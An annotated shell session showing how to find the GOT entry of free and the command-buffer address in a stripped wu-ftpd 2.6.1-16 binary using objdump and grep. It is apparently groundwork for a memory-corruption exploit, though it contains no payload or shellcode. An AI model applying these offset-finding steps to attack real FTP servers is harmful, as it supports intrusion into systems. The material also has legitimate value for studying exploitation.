## get the version string
[dvorak@redhat get-offset]$ strings in.ftpd | grep ^Version
Version wu-2.6.1-16
## get the GOT entry address of free (R_386_JUMP_SLOT); the grep below also matches globfree64, so take the exact "free" line (0807314c)
[dvorak@redhat get-offset]$ objdump --dynamic-reloc in.ftpd > dynrel
[dvorak@redhat get-offset]$ grep free dynrel
0807314c R_386_JUMP_SLOT free
0807319c R_386_JUMP_SLOT globfree64
## get cbuf (the command buffer): the binary is stripped, so locate it indirectly through the strncasecmp call in the command parser
[dvorak@redhat get-offset]$ objdump --disassemble in.ftpd > disass
objdump: in.ftpd: no symbols
[dvorak@redhat get-offset]$ objdump -T in.ftpd > dynsym
## first get the address the binary uses to call strncasecmp, from the dynamic symbol table (there are no local symbols, per the objdump error above)
[dvorak@redhat get-offset]$ grep strncasecmp dynsym
0804acd8 DF *UND* 00000065 GLIBC_2.0 strncasecmp
## look for calls to it whose 3rd argument (the length, pushed first under cdecl) is 0xa
[dvorak@redhat get-offset]$ grep 804acd8 -B3 disass | grep '\$0xa'
805a788: 6a 0a push $0xa
## see what is pushed last, i.e. used as the first argument (cbuf) to strncasecmp
[dvorak@redhat get-offset]$ grep -A3 '^ 805a788' disass
805a788: 6a 0a push $0xa
805a78a: 68 43 d7 06 08 push $0x806d743
805a78f: 53 push %ebx
805a790: e8 43 05 ff ff call 0x804acd8
## it's %ebx; see where %ebx is last written before the call
[dvorak@redhat get-offset]$ grep -B100 '^ 805a788' disass | grep ebx
805a68a: bb e0 5d 08 08 mov $0x8085de0,%ebx
805a6b0: 43 inc %ebx
805a6b1: 0f b6 13 movzbl (%ebx),%edx
805a6de: 89 df mov %ebx,%edi
805a6fa: bb 04 00 00 00 mov $0x4,%ebx
805a704: 89 1d e0 64 07 08 mov %ebx,0x80764e0
### EUREKA: the last write to %ebx before the call is at 805a70a (the pushes below only read it), so cbuf is at 0x8085de0 -- this assumes straight-line flow from 805a70a to 805a788; a branch into that range from elsewhere could load %ebx differently, so confirm in a debugger before relying on the offset
805a70a: bb e0 5d 08 08 mov $0x8085de0,%ebx
805a712: 0f b6 14 1e movzbl (%esi,%ebx,1),%edx
805a719: c6 04 1e 00 movb $0x0,(%esi,%ebx,1)
805a71d: 53 push %ebx
805a72d: 53 push %ebx
805a752: 53 push %ebx
805a772: 53 push %ebx
## that's all folks